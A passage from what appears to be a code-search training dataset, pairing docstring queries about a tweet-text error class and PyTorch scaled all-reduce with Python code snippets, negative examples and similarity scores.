"0.43654388", "0.4359844", "0.43399394", "0.4333495", "0.43246096", "0.43157473", "0.43107846", "0.43052602", "0.4283513", "0.42833996", "0.42783722", "0.42778176", "0.4276017", "0.42716137", "0.42714792", "0.4270669", "0.42680633", "0.4267554", "0.42673653" ]
0.0
-1
Initializes InvalidTweetText with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def set_error(self, code: Optional[int] = None, text: Optional[str] = None) -> None:\n if code is not None:\n self.error_code = code\n if text is not None:\n self.error_text = text", "def tweet_invalid(self):\r\n\r\n valid = True # optimism\r\n validation_error = None\r\n\r\n if not self.tweet_length():\r\n valid, validation_error = False, 'Empty text'\r\n\r\n if self.tweet_length() > MAX_LENGTH:\r\n valid, validation_error = False, 'Too long'\r\n\r\n if re.search(ur''.join(REGEXEN['invalid_control_characters']), self.text):\r\n valid, validation_error = False, 'Invalid characters'\r\n \r\n if self.parent and hasattr(self.parent, 'tweet_is_valid'):\r\n self.parent.tweet_is_valid = valid\r\n if self.parent and hasattr(self.parent, 'tweet_validation_error'):\r\n self.parent.tweet_validation_error = validation_error\r\n\r\n return validation_error if not valid else False", "def __init__(self, message, code, *args):\n self.message = message\n self.code = code\n super(TwitterException, self).__init__(message, code, *args)", "def __init__(self, text: Union[str, Text, None] = None):\n if isinstance(text, str):\n text = TNTParser().parse(text)\n if text is not None:\n self.text = text", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def set_text(self, tweet):\n\n if not tweet.has_key('text'):\n return\n\n text = tweet['text']\n\n # remove URIs\n text = re.sub(self.re_uri,\"\", text)\n # lower case string and remove non word characters\n text = re.sub(self.re_non_word, \" \", text.lower()).strip()\n\n self.text = text", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def error(self, text, info=None):\n self.details[\"message\"] = text\n if info:\n self.details[\"details\"] = info", "def on_init_fail(self, event_time, message):\n pass", "def error_message(self, error_message):\n\n self._error_message = error_message", "def __init__(self, text):\n\n self.text = text", "def __init__(self, message, text=None, reference=None, contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def setErrorMessage(self, errorText, errorColor = 0):\n\n if (errorColor == 1):\n errorColor = \"QTextEdit {color:Green}\"\n elif (errorColor == 0):\n errorColor = \"QTextEdit {color:red}\"\n else:\n # Why did you do this? Read the function? I'm going to make the text white to punish you\n errorColor = \"QTextEdit {color:white}\"\n \n node = EditUtil.EditUtil().getParameterNode()\n node.SetParameter(\"TraceAndSelect,errorMessage\", str(errorText))\n node.SetParameter(\"TraceAndSelect,errorMessageColor\", str(errorColor))\n return", "def __init__(self, text):\n self.text = text", "def __init__(self, text):\n self.text = text", "def text(self, text):\n if text is None:\n raise ValueError(\"Invalid value for `text`, must not be `None`\")\n\n self._text = text", "def __init__(self, text=None, settings=None, style='General', language='en'):\n\n self._text = None\n self._settings = None\n self._style = None\n self._language = None\n\n self.text = text\n self.settings = settings\n self.style = style\n self.language = language", "def __init__(self,\n text: str) -> None:\n\n super().__init__(text)", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def __init__(self, source_text, syntax_error_ctor):\n self.src = source_text\n self.syntax_error_ctor = syntax_error_ctor", "def __init__(self, message, repl):\n super(LinterFailure, self).__init__()\n self.message = message\n self.replacement = repl", "def test_invalid_text_input(self):\n m = Message(\n text=None, user_id=self.uid\n )\n db.session.add(m)\n with self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()", "def message_text(self, message_text):\n\n self._message_text = message_text", "def validate(self, text: Union[str, Text, None] = None) -> None:\n text = text or self.text\n if isinstance(text, str):\n text = TNTParser().parse(text)\n if text is not None:\n self.text = text\n try:\n for i, (lineno, line) in enumerate(text.items()):\n getattr(self, 'rule_' + line.rule.value\\\n .lower().replace(' ', '_').replace('-', '_'),\n self.rule_invalid)(i, line)\n except ProofMistake as exc:\n exc.args = (f\"line {line.lineno}: '{str(line)}' \" + exc.args[0], *exc.args[1:])\n raise", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, msg=\"\"\"Google can\\'t find enough news data for this query: Invalid query\"\"\"):\n super().__init__(msg)", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def init_text(self):\n d = self.declaration\n if d.text:\n self.set_text(d.text)\n if d.text_color:\n self.set_text_color(d.text_color)\n if d.text_alignment:\n self.set_text_alignment(d.text_alignment)\n if d.font_family or d.text_size:\n self.refresh_font()\n if hasattr(d, 'max_lines') and d.max_lines:\n self.set_max_lines(d.max_lines)", "def __init__(self, text=None, fact_id=None, fact_type=None, image_url=None,\n tts_url=None):\n self.id = fact_id or str(uuid4()).replace('-', '')\n self.text = text\n self.type = fact_type or 'TEXT'\n self.image_url = image_url\n self.tts_url = tts_url", "def set_error(self, error):\n self._set_sub_text('error', text=str(error))\n return self", "def __init__(self, tweet_json):\r\n self.tweet = tweet_json\r\n self.date = datetime.datetime.strptime(self.tweet[\"date\"], \"%Y-%m-%dT%H:%M:%S.000Z\")\r\n self.processed = False\r\n self.max_importance = 0\r\n try:\r\n text = re.sub(self.tweet[\"keywords\"][0], '', self.tweet[\"text\"])\r\n except IndexError:\r\n text = self.tweet[\"text\"]\r\n try:\r\n self.language = polyglot.detect.Detector(re.sub('#', '', text)).language.name\r\n except polyglot.detect.base.UnknownLanguage as e:\r\n self.language = \"mixed\"\r\n except:\r\n self.language = polyglot.detect.Detector(''.join([i if ord(i) < 128 else ' ' for i in text])).language.name", "def __init__(self, msg):\n\n super(HTTPError, self).__init__(msg)\n self.msg = msg", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self):\n self.message = \"No task found with the given string.\"", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def __init__(self, message, code=None):\n WebSocketError.__init__(self, message)\n self.code = code", "def _get_error_text(self, result: dict) -> str:\n try:\n return result[self._FIELD_TEXT]\n except KeyError:\n return self._DEFAULT_ERROR_MSG", "def verify_text_present(self, text, msg=None):\r\n try:\r\n self.assert_text_present(text, msg)\r\n except AssertionError, e:\r\n if msg:\r\n m = \"%s:\\n%s\" % (msg, str(e))\r\n else:\r\n m = str(e)\r\n self.verification_erorrs.append(m)", "def _validate_text(self, text):\n if text is None:\n return\n if not (0 < len(text) <= self.TEXT_MAX):\n raise ValidationError", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def __init__(self):\n self.message = \"Invalid time zone string, choose one from https://stackoverflow.com/questions/13866926/is-there-a-list-of-pytz-timezones.\"", "def __init__(self, text: Optional[str] = None, special_end_token: Optional[str] = None):\n super().__init__()\n text = text or PADDING_TEXT\n self.text_tokens = text.split()\n if special_end_token is not None:\n self.text_tokens.append(special_end_token)\n self.text_len = len(self.text_tokens)", "def error(text, window=None):\n message(text, u'Erro', M_ERROR, B_OK, window)", "def error(self, msg):\n with self._lock:\n self.wraptext(msg, fg=\"red\", bold=True)\n return self", "def setErrorMessage(self, errorMessage):\n self._errorMessage = errorMessage", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def test_init_with_invalid_body(self):\n body = {'foo': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert \"{'event_name': 'Required'}\" in str(excinfo.value)\n\n body = {'event_name': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)\n\n body = {'event_name': 'job.'}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)", "def __throw_exception(self, text):\n raise Exception(text)", "def __init__(self, tweet_data):\n _hashtags = tweet_data['entities']['hashtags']\n _str_date = tweet_data['created_at']\n self.account = Account(tweet_data['user'])\n self.date = self.format_date(_str_date)\n self.hashtags = [\"#%s\" % (tag['text']) for tag in _hashtags]\n self.likes = tweet_data['favorite_count']\n # Note: replies number is only available with\n # the Premium and Enterprise tier products.\n # https://developer.twitter.com/en/docs/tweets/data-dictionary/overview/tweet-object # noqa\n self.replies = 0\n self.retweets = tweet_data['retweet_count']\n self.text = tweet_data['text']", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def fail(self, text: str = \"FAIL\") -> None:\n _text = text if text else \"FAIL\"\n self._freeze(_text)", "def errMsg(self, code, text):\n # Preprocess text\n lines = text.splitlines()\n\n image = self.errMsgImage.copy()\n draw = ImageDraw.Draw(image)\n # Text\n x0 = self.width/4 + 2\n y0 = -1\n draw.text((x0, y0), 'ERROR {:5d}'.format(code), font=self.font, fill=255)\n for i in range(0,len(lines)):\n draw.text((x0, y0 + (i+1)*7), lines[i], font=self.font, fill=255)\n self.disp.image(image.rotate(180))\n self.disp.display()\n return", "def load_text(self, encoding='utf8', encoding_errors='ignore'):\n log.error('Cannot load: %s', self.file_name)", "def __init__(self):\n self.message = \"No stop found with the given string.\"", "def __init__(__self__, *,\n error_code: int,\n error_message: str,\n exception_message: str,\n recommended_action: str):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)\n pulumi.set(__self__, \"exception_message\", exception_message)\n pulumi.set(__self__, \"recommended_action\", recommended_action)", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def on_error(self, status_code, data):\n logging.warning(\"Error recieving tweet: {0}\".format(status_code))", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def text(self, text):\n if text is None:\n raise ValueError(\"Invalid value for `text`, must not be `None`\") # noqa: E501\n\n self._text = text", "def __parse_error(self, text):\n m = self.__size_expr.match(text)\n if m is not None:\n self.errcode = b\"\"\n self.errmsg = self.__read_block(int(m.group(1)) + 2)\n return\n\n m = self.__error_expr.match(text)\n if m is None:\n raise Error(\"Bad error message\")\n if m.group(1) is not None:\n self.errcode = m.group(1).strip(b\"()\")\n else:\n self.errcode = b\"\"\n self.errmsg = m.group(2).strip(b'\"')", "def __init__(self, errors):\n strerrors = \"\\n - \".join(errors)\n text = tr(\n \"Application error occurred on secondary appliance. \"\n \"Please read logs on the secondary appliance.\"\n )\n HAError.__init__(\n self,\n SECONDARY_FAILED_TO_APPLY,\n \"%s\\n - %s\" % (text, strerrors)\n )", "def __init__(self, reason, errorcode=None, cause=None):\n super().__init__(reason)\n if cause is not None and isinstance(cause, TGException):\n if errorcode is None:\n errorcode = cause.errorcode\n self._errorcode = errorcode\n self._cause = cause", "def error(self, message, code='UnknownError', error_code=None, http_status=400):\n\n # Some backwards compatibility\n if error_code is not None and code == 'UnknownError':\n code = error_code\n\n self._add_message( message, self.ERROR, code=code )\n self.n_errors += 1\n self.status = 'ERROR'\n self.http_status = http_status\n self.error_code = code\n self.message = message", "def set_error(errTxt):\r\n core.set_item_color(\"Start\", mvGuiCol_Button, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonActive, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonHovered, (255, 0, 0, 255))\r\n if not core.does_item_exist(\"Error##ErrorNoFACEITName\"):\r\n with simple.collapsing_header(\"Error##ErrorNoFACEITName\", parent=\"##GroupStats\",\r\n default_open=True,\r\n closable=False,\r\n bullet=True):\r\n core.add_text(\"ErrorText\", default_value=errTxt, color=(255, 0, 0, 255))", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def text(self, text):\n if self.local_vars_configuration.client_side_validation and text is None: # noqa: E501\n raise ValueError(\"Invalid value for `text`, must not be `None`\") # noqa: E501\n\n self._text = text", "def __init__(\n self,\n type,\n text):\n self.type = type\n self.text = text", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def __init__(self, module, message, _type, exc_message=None, *args, **kwargs):\n logger.error(\"[{}] {} {} {}\".format(module,\n _type,\n '<{}>'.format(exc_message) if exc_message else '',\n message))\n super(CliException, self).__init__(message, *args)\n self.message = message\n self.type = _type\n self.exc_message = exc_message\n self.str_at_error = kwargs.get('str_at_error', None)", "def __init__(\n self,\n *,\n text: Union[str, dict, TextObject],\n action_id: Optional[str] = None,\n url: Optional[str] = None,\n value: Optional[str] = None,\n style: Optional[str] = None, # primary, danger\n confirm: Optional[Union[dict, ConfirmObject]] = None,\n **others: dict,\n ):\n super().__init__(action_id=action_id, type=self.type)\n show_unknown_key_warning(self, others)\n\n # NOTE: default_type=PlainTextObject.type here is only for backward-compatibility with version 2.5.0\n self.text = TextObject.parse(text, default_type=PlainTextObject.type)\n self.url = url\n self.value = value\n self.style = style\n self.confirm = ConfirmObject.parse(confirm)", "def place_error_message(self, message):\n msg = tk.Message(self.parent, text='Error: ' + message)\n msg.config(bg='white', font=('times', 18, 'bold'))\n msg.pack()", "def add_error(self, err_msg):\n assert err_msg is not None, 'err_msg cannot be None'\n\n self.error_found = True\n self.error_message = err_msg.strip()", "def test_init_errors(self):\n t = self.Test({})\n self.assertEqual(t.errors, {})", "def SetText(self, text):\r\n\r\n self._text = text\r\n return self", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def __init__(self, error_msg):\n super(RequestTimeoutException, self).__init__(error_msg)", "def __init__(self, string, stem=None, stemmer=None):\n self.string = string\n self.stem = stem or self._get_stem(string)\n self.stemmer = stemmer or SnowballStemmer('lang')", "def __init__ (self, *args, **kw):\n if 0 == len(args) and 'message' in kw:\n args = (kw.pop('message'),)\n self._args = args\n self._kw = kw\n super(PyXBException, self).__init__(*args)", "def _set_text(self, text):\n if not self.has_textframe:\n raise TypeError(\"cannot set text of shape with no text frame\")\n self.textframe.text = _to_unicode(text)", "def __init__(__self__, *,\n error_code: pulumi.Input[Union[str, 'CopyCompletionErrorReason']],\n error_message: pulumi.Input[str]):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)", "def _error(self, token, msg):\n self._interpreter.parse_error(token, msg)\n return ParseError()", "def verify_text(self, text):\n pass", "def _set_text(self, text):\n self.clear()\n r = self.add_run()\n r.text = _to_unicode(text)", "def test_TSE_common(self):\n\n regexpr = re.compile(r'^Error [0-9]{4}: [\\w :-]+$')\n for code in TwitterSearchException._error_codes:\n self.assertTrue( regexpr.match( str(TwitterSearchException(code)) ), \"Odd string patterns detected\")\n\n foo = \"someString\"\n tse = \"%s\" % TwitterSearchException(2000,foo)\n self.assertTrue( regexpr.match(tse) and tse[len(foo)*-1:] == foo )", "def handle_exceptions(self: T, message: str, error: str) -> SpinnerContext[T]:\n return SpinnerContext(self, message, error)", "def create_error_box(self, message):\n messagebox.showerror(\"Error\", message)", "def SetText(self, text):\r\n\r\n self._text = text", "def settext(self, text):\n self.__text = text\n self.__nonzero = True", "def _initilize_message(self):\n\n message_label = ttk.Label(\n self._frame, text=\"Are you sure you want to delete this recipe?\")\n\n message_label.grid(row=0, column=0, columnspan=2, padx=5, pady=5)" ]
[ "0.6875406", "0.5868215", "0.5819681", "0.5728066", "0.562525", "0.55098635", "0.5487254", "0.54616547", "0.54316974", "0.5398727", "0.5387163", "0.5380475", "0.53396827", "0.53311336", "0.5290807", "0.52907974", "0.52791065", "0.525219", "0.525219", "0.5239347", "0.5238812", "0.52372146", "0.5201669", "0.51927084", "0.5191051", "0.51889", "0.51854956", "0.51754236", "0.51733637", "0.51723367", "0.51692367", "0.51481074", "0.5139778", "0.5137769", "0.51197815", "0.5065726", "0.50601673", "0.50535756", "0.50470006", "0.50400496", "0.50283813", "0.5026794", "0.50266993", "0.5006119", "0.4982496", "0.49793607", "0.49783534", "0.4964407", "0.49525705", "0.4945455", "0.49412706", "0.49388516", "0.49374396", "0.49373418", "0.49272358", "0.4916769", "0.49078768", "0.48741645", "0.48588932", "0.4846337", "0.4845869", "0.48413804", "0.48368523", "0.48282316", "0.48280966", "0.48278052", "0.4825061", "0.48211345", "0.48197484", "0.48155582", "0.4796017", "0.47929797", "0.47883913", "0.47761", "0.47714072", "0.47641915", "0.47640818", "0.47636464", "0.4763416", "0.47570258", "0.47563538", "0.47507712", "0.47368398", "0.47340328", "0.47337395", "0.4730454", "0.4723032", "0.4721987", "0.47101364", "0.47035307", "0.4700501", "0.469256", "0.46911222", "0.46856105", "0.46784776", "0.46758917", "0.46748072", "0.46683842", "0.46601853", "0.46565896", "0.46511483" ]
0.0
-1
Performs the scaled all_reduce operation on the provided tensors. The input tensors are modified inplace. Currently supports only the sum reduction operator. The reduced values are scaled by the inverse size of the process group.
def scaled_all_reduce(tensors: List[Tensor], num_gpus: int) -> List[Tensor]: # There is no need for reduction in the single-proc case if num_gpus == 1: return tensors # Queue the reductions reductions = [] for tensor in tensors: reduction = torch.distributed.all_reduce(tensor, async_op=True) reductions.append(reduction) # Wait for reductions to finish for reduction in reductions: reduction.wait() # Scale the results for tensor in tensors: tensor.mul_(1.0 / num_gpus) return tensors
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def allreduce_hook(state: AllReduceState, grad: torch.Tensor):\n if state.gradient_predivide_factor > 1:\n grad.div_(state.gradient_predivide_factor)\n dist.all_reduce(grad, group=state.process_group)\n if state.gradient_postdivide_factor > 1:\n grad.div_(state.gradient_postdivide_factor)", "def reduce(tensor, reduction=\"mean\"):\n\n def _reduce_across_processes(tensor, reduction=\"mean\"):\n state = PartialState()\n cloned_tensor = tensor.clone()\n if state.distributed_type == DistributedType.NO:\n return cloned_tensor\n if state.distributed_type == DistributedType.TPU:\n xm.all_reduce(\"sum\", cloned_tensor)\n elif state.distributed_type.value in TORCH_DISTRIBUTED_OPERATION_TYPES:\n torch.distributed.all_reduce(cloned_tensor, ReduceOp.SUM)\n if reduction == \"mean\":\n cloned_tensor /= state.num_processes\n return cloned_tensor\n\n return recursively_apply(_reduce_across_processes, tensor, error_on_other_type=True, reduction=reduction)", "def _reduce(self, values):\n\n if self.dim is None:\n return values\n\n if isinstance(self.dim, str):\n dim = [self.dim]\n else:\n dim = self.dim\n\n if self.reduce_func is None:\n for d in values.dims:\n if d not in dim:\n values = values.isel(**{d: 0})\n return values\n else:\n other_dims = [d for d in values.dims if d not in dim]\n return values.reduce(self.reduce_func, dim=other_dims)", "def all_reduce(self, world_size):\n if world_size == 1:\n return\n self.partials = defaultdict(float,\n all_reduce_cpu_scalars(self.partials))\n for k, v in self.partials.items():\n if self.accum_reductions[k] in ('mean', 'last'):\n self.partial_counts[k] *= (world_size - self.partials.get('ignore', 0))\n if self.partials.get('ignore', 0) > 0:\n assert self.accum_reductions[k] == 'mean'\n print_once(f'reducing with world size {world_size - self.partials.get(\"ignore\", 0)}')", "def apply_flattened_call_all(tensors, call):\n\n grouped_tensors = _group_by_tensor_type(tensors)\n for tensors in grouped_tensors.values():\n apply_flattened_call(tensors, call)", "def all_reduce_dict(py_dict, op='sum', group=None, to_float=True):\n _, world_size = get_dist_info()\n if world_size == 1:\n return py_dict\n if group is None:\n # TODO: May try not to use gloo in the future\n group = _get_global_gloo_group()\n if dist.get_world_size(group) == 1:\n return py_dict\n\n # all reduce logic across different devices.\n py_key = list(py_dict.keys())\n py_key_tensor = obj2tensor(py_key)\n dist.broadcast(py_key_tensor, src=0)\n py_key = tensor2obj(py_key_tensor)\n\n tensor_shapes = [py_dict[k].shape for k in py_key]\n tensor_numels = [py_dict[k].numel() for k in py_key]\n\n if to_float:\n flatten_tensor = torch.cat(\n [py_dict[k].flatten().float() for k in py_key])\n else:\n flatten_tensor = torch.cat([py_dict[k].flatten() for k in py_key])\n\n dist.all_reduce(flatten_tensor, op=dist.ReduceOp.SUM)\n if op == 'mean':\n flatten_tensor /= world_size\n\n split_tensors = [\n x.reshape(shape) for x, shape in zip(\n torch.split(flatten_tensor, tensor_numels), tensor_shapes)\n ]\n return OrderedDict({k: v for k, v in zip(py_key, split_tensors)})", "def same_scale(*tensors):\n # For each input, pull out data tensor and, if possible, scale tensor\n data_list, scale_list = [], []\n for t in tensors:\n if isinstance(t, STensor):\n data_list.append(t.data)\n scale_list.append(t.scale)\n else:\n if not isinstance(t, torch.Tensor):\n t = torch.tensor(t)\n data_list.append(t)\n scale_list.append(torch.zeros((1,)*len(t.shape)))\n\n # Broadcast data and scale tensors\n data_list = torch.broadcast_tensors(*data_list)\n scale_list = torch.broadcast_tensors(*scale_list)\n\n # Get shared scale tensor, which is elementwise max of input scales\n if len(tensors) == 2:\n out_scale = torch.maximum(*scale_list)\n else:\n out_scale = reduce(torch.maximum, scale_list[1:], scale_list[0])\n\n # Rescale all data tensors to correspond to out_scale\n data_list = [t * 2**(s-out_scale) for t, s in zip(data_list, scale_list)]\n\n return tuple(data_list), out_scale", "def rescale_all(self):\n for param_code in self.parameters.keys():\n self.rescale_parameter(param_code)", "def Allreduce4(net, blobs, reduced_affix, gpu_indices):\n a, b, c, d = blobs\n gpu_a, gpu_b, gpu_c, gpu_d = gpu_indices\n # a_reduced <- a+b, c_reduced <- c + d\n a_reduced = net.Add(\n [a, b],\n str(a) + reduced_affix,\n device_option=OnGPU(gpu_a)\n )\n c_reduced = net.Add(\n [c, d],\n str(c) + reduced_affix,\n device_option=OnGPU(gpu_c)\n )\n # a_reduced <- a_reduced + c_reduced\n a_reduced = a_reduced.Add(c_reduced, a_reduced, device_option=OnGPU(gpu_a))\n # broadcast a_reduced to c_reduced\n c_reduced = a_reduced.Copy([], c_reduced, device_option=OnGPU(gpu_c))\n # broadcast to b and d\n b_reduced = a_reduced.Copy(\n [],\n str(b) + reduced_affix,\n device_option=OnGPU(gpu_b)\n )\n d_reduced = c_reduced.Copy(\n [],\n str(d) + reduced_affix,\n device_option=OnGPU(gpu_d)\n )\n return a_reduced, b_reduced, c_reduced, d_reduced", "def Allreduce(net, blobs, reduced_affix=\"_reduced\", gpu_indices=None):\n if gpu_indices is None:\n gpu_indices = list(range(len(blobs)))\n if len(gpu_indices) != len(blobs):\n raise RuntimeError(\n \"gpu_indices length and blobs length mismatch: %d vs %d\" %\n (len(gpu_indices), len(blobs))\n )\n pattern = workspace.GetGpuPeerAccessPattern()\n if len(blobs) == 2 and pattern.shape[0] >= 2 and np.all(pattern[:2, :2]):\n return Allreduce2(net, blobs, reduced_affix, gpu_indices)\n elif len(blobs) == 4 and pattern.shape[0] >= 4 and np.all(pattern[:4, :4]):\n return Allreduce4(net, blobs, reduced_affix, gpu_indices)\n elif len(blobs) == 4 and pattern.shape[0] >= 4 and np.all(pattern[:2, :2]) and np.all(pattern[2:4, 2:4]):\n return Allreduce4Group2(net, blobs, reduced_affix, gpu_indices)\n elif len(blobs) == 8 and pattern.shape[0] >= 8 and np.all(pattern[:8, :8]):\n return Allreduce8(net, blobs, reduced_affix, gpu_indices)\n else:\n return AllreduceFallback(net, blobs, reduced_affix, gpu_indices)", "def reduce_tensor(num_gpus, ts):\n # todo loss of ddp mode\n if isinstance(ts, dict):\n raise NotImplementedError\n else:\n try:\n dist.reduce(ts, dst=0, op=dist.ReduceOp.SUM)\n ts /= num_gpus\n except:\n msg = '{}'.format(type(ts))\n raise NotImplementedError(msg)\n return ts", "def Allreduce(\n self,\n sendbuf: Union[DNDarray, torch.Tensor, Any],\n recvbuf: Union[DNDarray, torch.Tensor, Any],\n op: MPI.Op = MPI.SUM,\n ):\n ret, sbuf, rbuf, buf = self.__reduce_like(self.handle.Allreduce, sendbuf, recvbuf, op)\n if buf is not None and isinstance(buf, torch.Tensor) and buf.is_cuda and not CUDA_AWARE_MPI:\n buf.copy_(rbuf)\n return ret", "def perturb_tensors(self, scaling: str = 'none'):\n if self.clustering is True:\n for cluster in self.clusters:\n cluster.perturb_tensors()\n else:\n for name, item in tqdm(self.tensor_info.items(), 'Perturbing tensors'):\n tens = item[0]\n pert = item[1]\n repr = item[2]\n if repr is not None:\n repr.convert_tensor(tens)\n if pert is not None:\n for perturb in pert:\n if perturb is not None:\n perturb(tens, repr, scaling)", "def Allreduce4Group2(net, blobs, reduced_affix, gpu_indices):\n a, b, c, d = blobs\n gpu_a, gpu_b, gpu_c, gpu_d = gpu_indices\n # a_reduced <- a+b, c_reduced <- c + d\n a_reduced = net.Add(\n [a, b],\n str(a) + reduced_affix,\n device_option=OnGPU(gpu_a)\n )\n c_reduced = net.Add(\n [c, d],\n str(c) + reduced_affix,\n device_option=OnGPU(gpu_c)\n )\n # copy from c_reduce(gpu_c) to c_reduce_copy(gpu_a)\n c_reduced_copy = c_reduced.Copy(\n [],\n str(c_reduced) + '_copy',\n device_option=OnGPU(gpu_a)\n )\n # a_reduced <- a_reduced + c_reduced_copy\n a_reduced = a_reduced.Add(c_reduced_copy, a_reduced, device_option=OnGPU(gpu_a))\n # broadcast a_reduced to c_reduced\n c_reduced = a_reduced.Copy([], c_reduced, device_option=OnGPU(gpu_c))\n # broadcast to b and d\n b_reduced = a_reduced.Copy(\n [],\n str(b) + reduced_affix,\n device_option=OnGPU(gpu_b)\n )\n d_reduced = c_reduced.Copy(\n [],\n str(d) + reduced_affix,\n device_option=OnGPU(gpu_d)\n )\n return a_reduced, b_reduced, c_reduced, d_reduced", "def __call__(self, *args):\n assert len(args) == len(self.batch_axis), f'Number of arguments passed {len(args)} must match ' \\\n f'batched {len(self.batch_axis)}'\n nsplits = args[self.batch_axis_argnums[0][0]].shape[self.batch_axis_argnums[0][1]]\n output, changes = self._call(self.vc.tensors(), [v.split(nsplits) for v in self.vc.subset(RandomState)], *args)\n for v, u in zip(self.vc, changes):\n v.reduce(u)\n return output", "def reduce_mean(tensor):\n if not (dist.is_available() and dist.is_initialized()):\n return tensor\n tensor = tensor.clone()\n dist.all_reduce(tensor.div_(dist.get_world_size()), op=dist.ReduceOp.SUM)\n return tensor", "def reduce_mean(tensor):\n if not (dist.is_available() and dist.is_initialized()):\n return tensor\n tensor = tensor.clone()\n dist.all_reduce(tensor.div_(dist.get_world_size()), op=dist.ReduceOp.SUM)\n return tensor", "def Allreduce2(net, blobs, reduced_affix, gpu_indices):\n a, b = blobs\n gpu_a, gpu_b = gpu_indices\n a_reduced = net.Add([a, b], a + reduced_affix, device_option=OnGPU(gpu_a))\n b_reduced = a_reduced.Copy(\n [],\n b + reduced_affix,\n device_option=OnGPU(gpu_b)\n )\n return a_reduced, b_reduced", "def scalar_reduce(self, quantity, avg=False):\n\n base = self.sims[0].conf['General']['results_dir']\n self.log.info('Performing scalar reduction for group at %s' % base)\n self.log.debug('QUANTITY: %s'%quantity)\n group_comb = self.sims[0].get_scalar_quantity(quantity)\n self.log.debug(group_comb.dtype)\n 